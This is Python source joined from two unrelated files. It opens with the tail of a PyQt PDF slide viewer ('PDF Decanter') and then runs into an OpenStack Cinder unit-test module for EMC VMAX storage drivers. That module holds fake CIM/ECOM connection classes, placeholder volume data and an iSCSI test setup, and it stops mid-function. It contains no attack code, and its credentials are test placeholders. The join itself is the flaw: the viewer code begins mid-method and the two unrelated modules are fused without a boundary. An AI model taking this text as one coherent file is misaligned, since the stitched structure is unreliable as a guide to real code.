if r2.bottom() < r.top() or r2.top() > r.bottom():
continue # don't jump between rows
c2 = r2.center()
# sort by Y first (moving as few as possible in cursor dir.),
# then sort by difference in X to "current pos"
# (self._cursorPos is similar to r.center(), but allows to
# move over rows with fewer items without losing the original
# x position)
belowItems.append((sortDirection * getY(c2),
abs(getX(c2) - getX(self._cursorPos)),
otherItem))
if belowItems:
belowItems.sort()
sortY, _, desiredSlide = belowItems[0]
centerY = sortDirection * sortY
desiredSlideIndex = self._renderers.index(desiredSlide)
setY(self._cursorPos, centerY)
else:
currentSlideIndex = self._currentSlideIndex()
if event.key() == QtCore.Qt.Key_Right:
if currentSlideIndex < len(self._slides)-1:
desiredSlideIndex = currentSlideIndex + 1
elif event.key() == QtCore.Qt.Key_Left:
if currentSlideIndex > 0:
desiredSlideIndex = currentSlideIndex - 1
if desiredSlideIndex is not None:
self._currentFrameIndex = self._slides[desiredSlideIndex].currentFrame().frameIndex()
self._updateCursor(animated = True)
def start(view = None, show = True, **kwargs):
global app
hasApp = QtWidgets.QApplication.instance()
if not hasApp:
app = QtWidgets.QApplication(sys.argv)
else:
app = hasApp
app.setApplicationName("PDF Decanter")
app.setApplicationVersion(__version__)
result = PDFDecanter(view = view, **kwargs)
result.hadEventLoop = hasattr(app, '_in_event_loop') and app._in_event_loop # IPython support
if show and view is None:
result.view().show()
if sys.platform == "darwin":
result.view().raise_()
return result
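# Illustrative launcher (hedged sketch): 'talk.pdf' is a placeholder filename.
#
#   if __name__ == '__main__':
#       decanter = start()
#       decanter.enableGL()  # optional; falls back to raster rendering
#       decanter.loadPDF('talk.pdf', createCache = True)
#       if not decanter.hadEventLoop:
#           app.exec_()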
|
|
# Copyright (c) 2012 - 2014 EMC Corporation, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import shutil
import tempfile
import time
from xml.dom.minidom import Document
import mock
from cinder import exception
from cinder.openstack.common import log as logging
from cinder import test
from cinder.volume.drivers.emc.emc_vmax_common import EMCVMAXCommon
from cinder.volume.drivers.emc.emc_vmax_fast import EMCVMAXFast
from cinder.volume.drivers.emc.emc_vmax_fc import EMCVMAXFCDriver
from cinder.volume.drivers.emc.emc_vmax_iscsi import EMCVMAXISCSIDriver
from cinder.volume.drivers.emc.emc_vmax_masking import EMCVMAXMasking
from cinder.volume.drivers.emc.emc_vmax_utils import EMCVMAXUtils
from cinder.volume import volume_types
LOG = logging.getLogger(__name__)
CINDER_EMC_CONFIG_DIR = '/etc/cinder/'
class EMC_StorageVolume(dict):
pass
class CIM_StorageExtent(dict):
pass
class SE_InitiatorMaskingGroup(dict):
pass
class SE_ConcreteJob(dict):
pass
class SE_StorageHardwareID(dict):
pass
class Fake_CIMProperty():
def fake_getCIMProperty(self):
cimproperty = Fake_CIMProperty()
cimproperty.value = True
return cimproperty
def fake_getBlockSizeCIMProperty(self):
cimproperty = Fake_CIMProperty()
cimproperty.value = '512'
return cimproperty
def fake_getConsumableBlocksCIMProperty(self):
cimproperty = Fake_CIMProperty()
cimproperty.value = '12345'
return cimproperty
def fake_getIsConcatenatedCIMProperty(self):
cimproperty = Fake_CIMProperty()
cimproperty.value = True
return cimproperty
def fake_getIsCompositeCIMProperty(self):
cimproperty = Fake_CIMProperty()
cimproperty.value = False
return cimproperty
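# The Fake_CIMProperty helpers above stand in for pywbem.CIMProperty objects;
# within these tests the code under test only ever reads their .value
# attribute.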
class Fake_CIM_TierPolicyServiceCapabilities():
def fake_getpolicyinstance(self):
classinstance = Fake_CIM_TierPolicyServiceCapabilities()
classcimproperty = Fake_CIMProperty()
cimproperty = classcimproperty.fake_getCIMProperty()
cimproperties = {u'SupportsTieringPolicies': cimproperty}
classinstance.properties = cimproperties
return classinstance
class FakeCIMInstanceName(dict):
def fake_getinstancename(self, classname, bindings):
instancename = FakeCIMInstanceName()
for key in bindings:
instancename[key] = bindings[key]
instancename.classname = classname
instancename.namespace = 'root/emc'
return instancename
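# Stand-in for pywbem.CIMInstanceName; the test cases below stub
# EMCVMAXUtils.get_instance_name with fake_getinstancename so the driver
# receives these dictionaries instead of real CIM object paths.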
class FakeDB():
def volume_update(self, context, volume_id, model_update):
pass
def volume_get(self, context, volume_id):
conn = FakeEcomConnection()
objectpath = {}
objectpath['CreationClassName'] = 'Symm_StorageVolume'
if volume_id == 'vol1':
device_id = '1'
objectpath['DeviceID'] = device_id
else:
objectpath['DeviceID'] = volume_id
return conn.GetInstance(objectpath)
class EMCVMAXCommonData():
connector = {'ip': '10.0.0.2',
                 'initiator': 'iqn.1993-08.org.debian:01:222',
'wwpns': ["123456789012345", "123456789054321"],
'wwnns': ["223456789012345", "223456789054321"],
'host': 'fakehost'}
default_storage_group = (
        u'//10.108.246.202/root/emc:SE_DeviceMaskingGroup.InstanceID='
'"SYMMETRIX+000198700440+OS_default_GOLD1_SG"')
storage_system = 'SYMMETRIX+000195900551'
lunmaskctrl_id =\
'SYMMETRIX+000195900551+OS-fakehost-gold-MV'
lunmaskctrl_name =\
'OS-fakehost-gold-MV'
initiatorgroup_id =\
'SYMMETRIX+000195900551+OS-fakehost-IG'
initiatorgroup_name =\
'OS-fakehost-IG'
initiatorgroup_creationclass = 'SE_InitiatorMaskingGroup'
storageextent_creationclass = 'CIM_StorageExtent'
    initiator1 = 'iqn.1993-08.org.debian:01:1a2b3c4d5f6g'
stconf_service_creationclass = 'Symm_StorageConfigurationService'
ctrlconf_service_creationclass = 'Symm_ControllerConfigurationService'
elementcomp_service_creationclass = 'Symm_ElementCompositionService'
storreloc_service_creationclass = 'Symm_StorageRelocationService'
replication_service_creationclass = 'EMC_ReplicationService'
vol_creationclass = 'Symm_StorageVolume'
pool_creationclass = 'Symm_VirtualProvisioningPool'
lunmask_creationclass = 'Symm_LunMaskingSCSIProtocolController'
lunmask_creationclass2 = 'Symm_LunMaskingView'
hostedservice_creationclass = 'CIM_HostedService'
policycapability_creationclass = 'CIM_TierPolicyServiceCapabilities'
policyrule_creationclass = 'Symm_TierPolicyRule'
assoctierpolicy_creationclass = 'CIM_StorageTier'
storagepool_creationclass = 'Symm_VirtualProvisioningPool'
storagegroup_creationclass = 'CIM_DeviceMaskingGroup'
hardwareid_creationclass = 'SE_StorageHardwareID'
storagepoolid = 'SYMMETRIX+000195900551+U+gold'
storagegroupname = 'OS_default_GOLD1_SG'
storagevolume_creationclass = 'EMC_StorageVolume'
policyrule = 'gold'
poolname = 'gold'
unit_creationclass = 'CIM_ProtocolControllerForUnit'
storage_type = 'gold'
keybindings = {'CreationClassName': u'Symm_StorageVolume',
'SystemName': u'SYMMETRIX+000195900551',
'DeviceID': u'1',
'SystemCreationClassName': u'Symm_StorageSystem'}
keybindings2 = {'CreationClassName': u'Symm_StorageVolume',
'SystemName': u'SYMMETRIX+000195900551',
'DeviceID': u'99999',
'SystemCreationClassName': u'Symm_StorageSystem'}
provider_location = {'classname': 'Symm_StorageVolume',
'keybindings': keybindings}
provider_location2 = {'classname': 'Symm_StorageVolume',
'keybindings': keybindings2}
properties = {'ConsumableBlocks': '12345',
'BlockSize': '512'}
test_volume = {'name': 'vol1',
'size': 1,
'volume_name': 'vol1',
'id': '1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'vol1',
'display_description': 'test volume',
'volume_type_id': 'abc',
'provider_location': str(provider_location),
'status': 'available',
'host': 'fake-host'
}
test_failed_volume = {'name': 'failed_vol',
'size': 1,
'volume_name': 'failed_vol',
'id': '4',
'provider_auth': None,
'project_id': 'project',
'display_name': 'failed_vol',
'display_description': 'test failed volume',
'volume_type_id': 'abc'}
failed_delete_vol = {'name': 'failed_delete_vol',
'size': '-1',
'volume_name': 'failed_delete_vol',
'id': '99999',
'provider_auth': None,
'project_id': 'project',
'display_name': 'failed delete vol',
'display_description': 'failed delete volume',
'volume_type_id': 'abc',
'provider_location': str(provider_location2)}
test_source_volume = {'size': 1,
'volume_type_id': 'sourceid',
'display_name': 'sourceVolume',
'name': 'sourceVolume',
'volume_name': 'vmax-154326',
'provider_auth': None,
                          'project_id': 'project',
                          'id': '2',
'provider_location': str(provider_location),
'display_description': 'snapshot source volume'}
location_info = {'location_info': '000195900551#silver#None',
'storage_protocol': 'ISCSI'}
test_host = {'capabilities': location_info,
'host': 'fake_host'}
test_ctxt = {}
new_type = {}
diff = {}
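# In-memory stand-in for the pywbem connection to the ECOM server; it
# implements only the WBEM operations the driver exercises (InvokeMethod,
# EnumerateInstances/Names, GetInstance, Associators, ReferenceNames, ...).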
class FakeEcomConnection():
def __init__(self, *args, **kwargs):
self.data = EMCVMAXCommonData()
def InvokeMethod(self, MethodName, Service, ElementName=None, InPool=None,
ElementType=None, Size=None,
SyncType=None, SourceElement=None,
Operation=None, Synchronization=None,
TheElements=None, TheElement=None,
LUNames=None, InitiatorPortIDs=None, DeviceAccesses=None,
ProtocolControllers=None,
MaskingGroup=None, Members=None,
HardwareId=None, ElementSource=None, EMCInPools=None,
CompositeType=None, EMCNumberOfMembers=None,
EMCBindElements=None,
InElements=None, TargetPool=None, RequestedState=None):
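        # Mirror the pywbem calling convention: return a (return_code,
        # out_params) tuple; the 'Job' out-parameter is what the driver
        # polls via GetInstance until the concrete job finishes.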
rc = 0L
myjob = SE_ConcreteJob()
myjob.classname = 'SE_ConcreteJob'
myjob['InstanceID'] = '9999'
myjob['status'] = 'success'
myjob['type'] = ElementName
if Size == -1073741824 and \
MethodName == 'CreateOrModifyCompositeElement':
rc = 0L
myjob = SE_ConcreteJob()
myjob.classname = 'SE_ConcreteJob'
myjob['InstanceID'] = '99999'
myjob['status'] = 'success'
myjob['type'] = 'failed_delete_vol'
elif ElementName is None and \
MethodName == 'CreateOrModifyCompositeElement':
rc = 0L
myjob = SE_ConcreteJob()
myjob.classname = 'SE_ConcreteJob'
myjob['InstanceID'] = '9999'
myjob['status'] = 'success'
myjob['type'] = 'vol1'
if ElementName == 'failed_vol' and \
MethodName == 'CreateOrModifyElementFromStoragePool':
rc = 10L
myjob['status'] = 'failure'
elif TheElements and \
TheElements[0]['DeviceID'] == '99999' and \
MethodName == 'EMCReturnToStoragePool':
rc = 10L
myjob['status'] = 'failure'
elif HardwareId:
rc = 0L
targetendpoints = {}
endpoints = []
endpoint = {}
endpoint['Name'] = '1234567890123'
endpoints.append(endpoint)
endpoint2 = {}
endpoint2['Name'] = '0987654321321'
endpoints.append(endpoint2)
targetendpoints['TargetEndpoints'] = endpoints
return rc, targetendpoints
job = {'Job': myjob}
return rc, job
def EnumerateInstanceNames(self, name):
result = None
if name == 'EMC_StorageConfigurationService':
result = self._enum_stconfsvcs()
elif name == 'EMC_ControllerConfigurationService':
result = self._enum_ctrlconfsvcs()
elif name == 'Symm_ElementCompositionService':
result = self._enum_elemcompsvcs()
elif name == 'Symm_StorageRelocationService':
result = self._enum_storrelocsvcs()
elif name == 'EMC_ReplicationService':
result = self._enum_replicsvcs()
elif name == 'EMC_VirtualProvisioningPool':
result = self._enum_pools()
elif name == 'EMC_StorageVolume':
result = self._enum_storagevolumes()
elif name == 'Symm_StorageVolume':
result = self._enum_storagevolumes()
elif name == 'CIM_ProtocolControllerForUnit':
result = self._enum_unitnames()
elif name == 'EMC_LunMaskingSCSIProtocolController':
result = self._enum_lunmaskctrls()
elif name == 'EMC_StorageProcessorSystem':
result = self._enum_processors()
elif name == 'EMC_StorageHardwareIDManagementService':
result = self._enum_hdwidmgmts()
elif name == 'SE_StorageHardwareID':
result = self._enum_storhdwids()
else:
result = self._default_enum()
return result
def EnumerateInstances(self, name):
result = None
if name == 'EMC_VirtualProvisioningPool':
result = self._enum_pool_details()
elif name == 'SE_StorageHardwareID':
result = self._enum_storhdwids()
else:
result = self._default_enum()
return result
def GetInstance(self, objectpath, LocalOnly=False):
try:
name = objectpath['CreationClassName']
except KeyError:
name = objectpath.classname
result = None
if name == 'Symm_StorageVolume':
result = self._getinstance_storagevolume(objectpath)
elif name == 'CIM_ProtocolControllerForUnit':
result = self._getinstance_unit(objectpath)
elif name == 'SE_ConcreteJob':
result = self._getinstance_job(objectpath)
elif name == 'SE_StorageSynchronized_SV_SV':
result = self._getinstance_syncsvsv(objectpath)
elif name == 'Symm_TierPolicyServiceCapabilities':
result = self._getinstance_policycapabilities(objectpath)
elif name == 'CIM_TierPolicyServiceCapabilities':
result = self._getinstance_policycapabilities(objectpath)
elif name == 'SE_InitiatorMaskingGroup':
result = self._getinstance_initiatormaskinggroup(objectpath)
elif name == 'SE_StorageHardwareID':
result = self._getinstance_storagehardwareid(objectpath)
else:
result = self._default_getinstance(objectpath)
return result
def DeleteInstance(self, objectpath):
pass
def Associators(self, objectpath, ResultClass='EMC_StorageHardwareID'):
result = None
if ResultClass == 'EMC_StorageHardwareID':
result = self._assoc_hdwid()
elif ResultClass == 'EMC_iSCSIProtocolEndpoint':
result = self._assoc_endpoint()
elif ResultClass == 'EMC_StorageVolume':
result = self._assoc_storagevolume(objectpath)
else:
result = self._default_assoc(objectpath)
return result
def AssociatorNames(self, objectpath,
ResultClass='default', AssocClass='default'):
result = None
if ResultClass == 'EMC_LunMaskingSCSIProtocolController':
result = self._assocnames_lunmaskctrl()
elif AssocClass == 'CIM_HostedService':
result = self._assocnames_hostedservice()
elif ResultClass == 'CIM_TierPolicyServiceCapabilities':
result = self._assocnames_policyCapabilities()
elif ResultClass == 'Symm_TierPolicyRule':
result = self._assocnames_policyrule()
elif AssocClass == 'CIM_AssociatedTierPolicy':
result = self._assocnames_assoctierpolicy()
elif ResultClass == 'CIM_StoragePool':
result = self._assocnames_storagepool()
elif ResultClass == 'EMC_VirtualProvisioningPool':
result = self._assocnames_storagepool()
elif ResultClass == 'CIM_DeviceMaskingGroup':
result = self._assocnames_storagegroup()
elif ResultClass == 'EMC_StorageVolume':
result = self._enum_storagevolumes()
elif ResultClass == 'Symm_StorageVolume':
result = self._enum_storagevolumes()
elif ResultClass == 'SE_InitiatorMaskingGroup':
result = self._enum_initiatorMaskingGroup()
elif ResultClass == 'CIM_StorageExtent':
result = self._enum_storage_extent()
elif ResultClass == 'SE_StorageHardwareID':
result = self._enum_storhdwids()
else:
result = self._default_assocnames(objectpath)
return result
def ReferenceNames(self, objectpath,
ResultClass='CIM_ProtocolControllerForUnit'):
result = None
if ResultClass == 'CIM_ProtocolControllerForUnit':
result = self._ref_unitnames2()
else:
result = self._default_ref(objectpath)
return result
def _ref_unitnames(self):
unitnames = []
unitname = {}
dependent = {}
dependent['CreationClassName'] = self.data.vol_creationclass
dependent['DeviceID'] = self.data.test_volume['id']
dependent['ElementName'] = self.data.test_volume['name']
dependent['SystemName'] = self.data.storage_system
antecedent = {}
antecedent['CreationClassName'] = self.data.lunmask_creationclass
antecedent['DeviceID'] = self.data.lunmaskctrl_id
antecedent['SystemName'] = self.data.storage_system
unitname['Dependent'] = dependent
unitname['Antecedent'] = antecedent
unitname['CreationClassName'] = self.data.unit_creationclass
unitnames.append(unitname)
return unitnames
def _ref_unitnames2(self):
unitnames = []
unitname = {}
dependent = {}
dependent['CreationClassName'] = self.data.vol_creationclass
dependent['DeviceID'] = self.data.test_volume['id']
dependent['ElementName'] = self.data.test_volume['name']
dependent['SystemName'] = self.data.storage_system
antecedent = {}
antecedent['CreationClassName'] = self.data.lunmask_creationclass2
antecedent['SystemName'] = self.data.storage_system
unitname['Dependent'] = dependent
unitname['Antecedent'] = antecedent
unitname['CreationClassName'] = self.data.unit_creationclass
unitnames.append(unitname)
return unitnames
def _default_ref(self, objectpath):
return objectpath
def _assoc_hdwid(self):
assocs = []
assoc = {}
assoc['StorageID'] = self.data.connector['initiator']
assocs.append(assoc)
for wwpn in self.data.connector['wwpns']:
assoc2 = {}
assoc2['StorageID'] = wwpn
assocs.append(assoc2)
return assocs
def _assoc_endpoint(self):
assocs = []
assoc = {}
        assoc['Name'] = 'iqn.1992-04.com.emc:50000973f006dd80'
assoc['SystemName'] = self.data.storage_system
assocs.append(assoc)
return assocs
# Added test for EMC_StorageVolume associators
def _assoc_storagevolume(self, objectpath):
assocs = []
if 'type' not in objectpath:
vol = self.data.test_volume
elif objectpath['type'] == 'failed_delete_vol':
vol = self.data.failed_delete_vol
elif objectpath['type'] == 'vol1':
vol = self.data.test_volume
elif objectpath['type'] == 'appendVolume':
vol = self.data.test_volume
elif objectpath['type'] == 'failed_vol':
vol = self.data.test_failed_volume
else:
return None
vol['DeviceID'] = vol['id']
assoc = self._getinstance_storagevolume(vol)
assocs.append(assoc)
return assocs
def _default_assoc(self, objectpath):
return objectpath
def _assocnames_lunmaskctrl(self):
return self._enum_lunmaskctrls()
def _assocnames_hostedservice(self):
return self._enum_hostedservice()
def _assocnames_policyCapabilities(self):
return self._enum_policycapabilities()
def _assocnames_policyrule(self):
return self._enum_policyrules()
def _assocnames_assoctierpolicy(self):
return self._enum_assoctierpolicy()
def _assocnames_storagepool(self):
return self._enum_storagepool()
def _assocnames_storagegroup(self):
return self._enum_storagegroup()
def _assocnames_storagevolume(self):
return self._enum_storagevolume()
def _default_assocnames(self, objectpath):
return objectpath
    def _getinstance_storagevolume(self, objectpath):
        # Return the enumerated volume whose DeviceID matches, or None.
        for vol in self._enum_storagevolumes():
            if vol['DeviceID'] == objectpath['DeviceID']:
                return vol
        return None
def _getinstance_lunmask(self):
lunmask = {}
lunmask['CreationClassName'] = self.data.lunmask_creationclass
lunmask['DeviceID'] = self.data.lunmaskctrl_id
lunmask['SystemName'] = self.data.storage_system
return lunmask
def _getinstance_initiatormaskinggroup(self, objectpath):
initiatorgroup = SE_InitiatorMaskingGroup()
initiatorgroup['CreationClassName'] = (
self.data.initiatorgroup_creationclass)
initiatorgroup['DeviceID'] = self.data.initiatorgroup_id
initiatorgroup['SystemName'] = self.data.storage_system
initiatorgroup.path = initiatorgroup
return initiatorgroup
def _getinstance_storagehardwareid(self, objectpath):
hardwareid = SE_StorageHardwareID()
hardwareid['CreationClassName'] = self.data.hardwareid_creationclass
hardwareid['SystemName'] = self.data.storage_system
hardwareid['StorageID'] = self.data.connector['wwpns'][0]
hardwareid.path = hardwareid
return hardwareid
def _getinstance_unit(self, objectpath):
unit = {}
dependent = {}
dependent['CreationClassName'] = self.data.vol_creationclass
dependent['DeviceID'] = self.data.test_volume['id']
dependent['ElementName'] = self.data.test_volume['name']
dependent['SystemName'] = self.data.storage_system
antecedent = {}
antecedent['CreationClassName'] = self.data.lunmask_creationclass
antecedent['DeviceID'] = self.data.lunmaskctrl_id
antecedent['SystemName'] = self.data.storage_system
unit['Dependent'] = dependent
unit['Antecedent'] = antecedent
unit['CreationClassName'] = self.data.unit_creationclass
unit['DeviceNumber'] = '1'
return unit
def _getinstance_job(self, jobpath):
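        # JobState follows CIM_ConcreteJob semantics: 7 == Completed,
        # 10 == Exception.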
jobinstance = {}
jobinstance['InstanceID'] = '9999'
if jobpath['status'] == 'failure':
jobinstance['JobState'] = 10
jobinstance['ErrorCode'] = 99
jobinstance['ErrorDescription'] = 'Failure'
else:
jobinstance['JobState'] = 7
jobinstance['ErrorCode'] = 0
jobinstance['ErrorDescription'] = ''
return jobinstance
def _getinstance_policycapabilities(self, policycapabilitypath):
instance = Fake_CIM_TierPolicyServiceCapabilities()
fakeinstance = instance.fake_getpolicyinstance()
return fakeinstance
def _default_getinstance(self, objectpath):
return objectpath
def _enum_stconfsvcs(self):
conf_services = []
conf_service = {}
conf_service['SystemName'] = self.data.storage_system
conf_service['CreationClassName'] =\
self.data.stconf_service_creationclass
conf_services.append(conf_service)
return conf_services
def _enum_ctrlconfsvcs(self):
conf_services = []
conf_service = {}
conf_service['SystemName'] = self.data.storage_system
conf_service['CreationClassName'] =\
self.data.ctrlconf_service_creationclass
conf_services.append(conf_service)
return conf_services
def _enum_elemcompsvcs(self):
comp_services = []
comp_service = {}
comp_service['SystemName'] = self.data.storage_system
comp_service['CreationClassName'] =\
self.data.elementcomp_service_creationclass
comp_services.append(comp_service)
return comp_services
def _enum_storrelocsvcs(self):
reloc_services = []
reloc_service = {}
reloc_service['SystemName'] = self.data.storage_system
reloc_service['CreationClassName'] =\
self.data.storreloc_service_creationclass
reloc_services.append(reloc_service)
return reloc_services
def _enum_replicsvcs(self):
replic_services = []
replic_service = {}
replic_service['SystemName'] = self.data.storage_system
replic_service['CreationClassName'] =\
self.data.replication_service_creationclass
replic_services.append(replic_service)
return replic_services
def _enum_pools(self):
pools = []
pool = {}
pool['InstanceID'] = self.data.storage_system + '+U+' +\
self.data.storage_type
pool['CreationClassName'] = 'Symm_VirtualProvisioningPool'
pool['ElementName'] = 'gold'
pools.append(pool)
return pools
def _enum_pool_details(self):
pools = []
pool = {}
pool['InstanceID'] = self.data.storage_system + '+U+' +\
self.data.storage_type
pool['CreationClassName'] = 'Symm_VirtualProvisioningPool'
pool['TotalManagedSpace'] = 12345678
pool['RemainingManagedSpace'] = 123456
pools.append(pool)
return pools
def _enum_storagevolumes(self):
vols = []
vol = EMC_StorageVolume()
vol['name'] = self.data.test_volume['name']
vol['CreationClassName'] = 'Symm_StorageVolume'
vol['ElementName'] = self.data.test_volume['name']
vol['DeviceID'] = self.data.test_volume['id']
vol['SystemName'] = self.data.storage_system
        vol['SystemCreationClassName'] = 'Symm_StorageSystem'
        # Let the instance double as its own CIM object path (pywbem-style).
        vol.path = vol
        vol.path.classname = vol['CreationClassName']
classcimproperty = Fake_CIMProperty()
blocksizecimproperty = classcimproperty.fake_getBlockSizeCIMProperty()
consumableBlockscimproperty = (
classcimproperty.fake_getConsumableBlocksCIMProperty())
isCompositecimproperty = (
classcimproperty.fake_getIsCompositeCIMProperty())
        properties = {u'ConsumableBlocks': consumableBlockscimproperty,
                      u'BlockSize': blocksizecimproperty,
                      u'IsComposite': isCompositecimproperty}
vol.properties = properties
name = {}
name['classname'] = 'Symm_StorageVolume'
keys = {}
keys['CreationClassName'] = 'Symm_StorageVolume'
keys['SystemName'] = self.data.storage_system
keys['DeviceID'] = vol['DeviceID']
keys['SystemCreationClassName'] = 'Symm_StorageSystem'
name['keybindings'] = keys
vol['provider_location'] = str(name)
vols.append(vol)
failed_delete_vol = EMC_StorageVolume()
failed_delete_vol['name'] = 'failed_delete_vol'
failed_delete_vol['CreationClassName'] = 'Symm_StorageVolume'
failed_delete_vol['ElementName'] = 'failed_delete_vol'
failed_delete_vol['DeviceID'] = '99999'
failed_delete_vol['SystemName'] = self.data.storage_system
        failed_delete_vol['SystemCreationClassName'] = 'Symm_StorageSystem'
        # Let the instance double as its own CIM object path (pywbem-style).
        failed_delete_vol.path = failed_delete_vol
        failed_delete_vol.path.classname =\
            failed_delete_vol['CreationClassName']
vols.append(failed_delete_vol)
failed_vol = EMC_StorageVolume()
        failed_vol['name'] = 'failed_vol'
failed_vol['CreationClassName'] = 'Symm_StorageVolume'
failed_vol['ElementName'] = 'failed_vol'
failed_vol['DeviceID'] = '4'
failed_vol['SystemName'] = self.data.storage_system
        failed_vol['SystemCreationClassName'] = 'Symm_StorageSystem'
        # Let the instance double as its own CIM object path (pywbem-style).
        failed_vol.path = failed_vol
        failed_vol.path.classname =\
            failed_vol['CreationClassName']
name_failed = {}
name_failed['classname'] = 'Symm_StorageVolume'
keys_failed = {}
keys_failed['CreationClassName'] = 'Symm_StorageVolume'
keys_failed['SystemName'] = self.data.storage_system
keys_failed['DeviceID'] = failed_vol['DeviceID']
keys_failed['SystemCreationClassName'] = 'Symm_StorageSystem'
name_failed['keybindings'] = keys_failed
failed_vol['provider_location'] = str(name_failed)
vols.append(failed_vol)
return vols
def _enum_initiatorMaskingGroup(self):
initatorgroups = []
initatorgroup = {}
initatorgroup['CreationClassName'] = (
self.data.initiatorgroup_creationclass)
initatorgroup['DeviceID'] = self.data.initiatorgroup_id
initatorgroup['SystemName'] = self.data.storage_system
initatorgroup['ElementName'] = self.data.initiatorgroup_name
# initatorgroup.path = initatorgroup
# initatorgroup.path.classname = initatorgroup['CreationClassName']
initatorgroups.append(initatorgroup)
return initatorgroups
def _enum_storage_extent(self):
storageExtents = []
storageExtent = CIM_StorageExtent()
storageExtent['CreationClassName'] = (
self.data.storageextent_creationclass)
classcimproperty = Fake_CIMProperty()
isConcatenatedcimproperty = (
classcimproperty.fake_getIsConcatenatedCIMProperty())
properties = {u'IsConcatenated': isConcatenatedcimproperty}
storageExtent.properties = properties
storageExtents.append(storageExtent)
return storageExtents
def _enum_lunmaskctrls(self):
ctrls = []
ctrl = {}
ctrl['CreationClassName'] = self.data.lunmask_creationclass
ctrl['DeviceID'] = self.data.lunmaskctrl_id
ctrl['SystemName'] = self.data.storage_system
ctrl['ElementName'] = self.data.lunmaskctrl_name
ctrls.append(ctrl)
return ctrls
def _enum_hostedservice(self):
hostedservices = []
hostedservice = {}
hostedservice['CreationClassName'] = (
self.data.hostedservice_creationclass)
hostedservice['SystemName'] = self.data.storage_system
hostedservices.append(hostedservice)
return hostedservices
def _enum_policycapabilities(self):
policycapabilities = []
policycapability = {}
policycapability['CreationClassName'] = (
self.data.policycapability_creationclass)
policycapability['SystemName'] = self.data.storage_system
propertiesList = []
CIMProperty = {'is_array': True}
properties = {u'SupportedTierFeatures': CIMProperty}
propertiesList.append(properties)
policycapability['Properties'] = propertiesList
policycapabilities.append(policycapability)
return policycapabilities
def _enum_policyrules(self):
policyrules = []
policyrule = {}
policyrule['CreationClassName'] = self.data.policyrule_creationclass
policyrule['SystemName'] = self.data.storage_system
policyrule['PolicyRuleName'] = self.data.policyrule
policyrules.append(policyrule)
return policyrules
def _enum_assoctierpolicy(self):
assoctierpolicies = []
assoctierpolicy = {}
assoctierpolicy['CreationClassName'] = (
self.data.assoctierpolicy_creationclass)
assoctierpolicies.append(assoctierpolicy)
return assoctierpolicies
def _enum_storagepool(self):
storagepools = []
storagepool = {}
storagepool['CreationClassName'] = self.data.storagepool_creationclass
storagepool['InstanceID'] = self.data.storagepoolid
storagepool['ElementName'] = 'gold'
storagepools.append(storagepool)
return storagepools
def _enum_storagegroup(self):
storagegroups = []
storagegroup = {}
storagegroup['CreationClassName'] = (
self.data.storagegroup_creationclass)
storagegroup['ElementName'] = self.data.storagegroupname
storagegroups.append(storagegroup)
return storagegroups
def _enum_storagevolume(self):
storagevolumes = []
storagevolume = {}
storagevolume['CreationClassName'] = (
self.data.storagevolume_creationclass)
storagevolumes.append(storagevolume)
return storagevolumes
def _enum_hdwidmgmts(self):
services = []
srv = {}
srv['SystemName'] = self.data.storage_system
services.append(srv)
return services
def _enum_storhdwids(self):
storhdwids = []
hdwid = SE_StorageHardwareID()
hdwid['CreationClassName'] = self.data.hardwareid_creationclass
hdwid['StorageID'] = self.data.connector['wwpns'][0]
hdwid.path = hdwid
storhdwids.append(hdwid)
return storhdwids
def _default_enum(self):
names = []
name = {}
name['Name'] = 'default'
names.append(name)
return names
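# The test cases below route the driver onto this fake by stubbing
# EMCVMAXCommon._get_ecom_connection, e.g.:
#     self.stubs.Set(EMCVMAXCommon, '_get_ecom_connection',
#                    self.fake_ecom_connection)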
class EMCVMAXISCSIDriverNoFastTestCase(test.TestCase):
def setUp(self):
self.data = EMCVMAXCommonData()
self.tempdir = tempfile.mkdtemp()
super(EMCVMAXISCSIDriverNoFastTestCase, self).setUp()
self.config_file_path = None
self.config_file_1364232 = None
self.create_fake_config_file_no_fast()
self.addCleanup(self._cleanup)
configuration = mock.Mock()
configuration.safe_get.return_value = 'ISCSINoFAST'
configuration.cinder_emc_config_file = self.config_file_path
configuration.config_group = 'ISCSINoFAST'
self.stubs.Set(EMCVMAXISCSIDriver, 'smis_do_iscsi_discovery',
self.fake_do_iscsi_discovery)
self.stubs.Set(EMCVMAXCommon, '_get_ecom_connection',
self.fake_ecom_connection)
instancename = FakeCIMInstanceName()
self.stubs.Set(EMCVMAXUtils, 'get_instance_name',
instancename.fake_getinstancename)
self.stubs.Set(time, 'sleep',
self.fake_sleep)
driver = EMCVMAXISCSIDriver(configuration=configuration)
driver.db = FakeDB()
self.driver = driver
self.driver.utils = EMCVMAXUtils(object)
def create_fake_config_file_no_fast(self):
doc = Document()
emc = doc.createElement("EMC")
doc.appendChild(emc)
array = doc.createElement("Array")
arraytext = doc.createTextNode("1234567891011")
emc.appendChild(array)
array.appendChild(arraytext)
ecomserverip = doc.createElement("EcomServerIp")
ecomserveriptext = doc.createTextNode("1.1.1.1")
emc.appendChild(ecomserverip)
ecomserverip.appendChild(ecomserveriptext)
ecomserverport = doc.createElement("EcomServerPort")
ecomserverporttext = doc.createTextNode("10")
emc.appendChild(ecomserverport)
ecomserverport.appendChild(ecomserverporttext)
ecomusername = doc.createElement("EcomUserName")
ecomusernametext = doc.createTextNode("user")
emc.appendChild(ecomusername)
ecomusername.appendChild(ecomusernametext)
ecompassword = doc.createElement("EcomPassword")
ecompasswordtext = doc.createTextNode("pass")
emc.appendChild(ecompassword)
ecompassword.appendChild(ecompasswordtext)
portgroup = doc.createElement("PortGroup")
portgrouptext = doc.createTextNode("myPortGroup")
portgroup.appendChild(portgrouptext)
portgroups = doc.createElement("PortGroups")
portgroups.appendChild(portgroup)
emc.appendChild(portgroups)
pool = doc.createElement("Pool")
pooltext = doc.createTextNode("gold")
emc.appendChild(pool)
pool.appendChild(pooltext)
array = doc.createElement("Array")
arraytext = doc.createTextNode("0123456789")
emc.appendChild(array)
array.appendChild(arraytext)
timeout = doc.createElement("Timeout")
timeouttext = doc.createTextNode("0")
emc.appendChild(timeout)
timeout.appendChild(timeouttext)
filename = 'cinder_emc_config_ISCSINoFAST.xml'
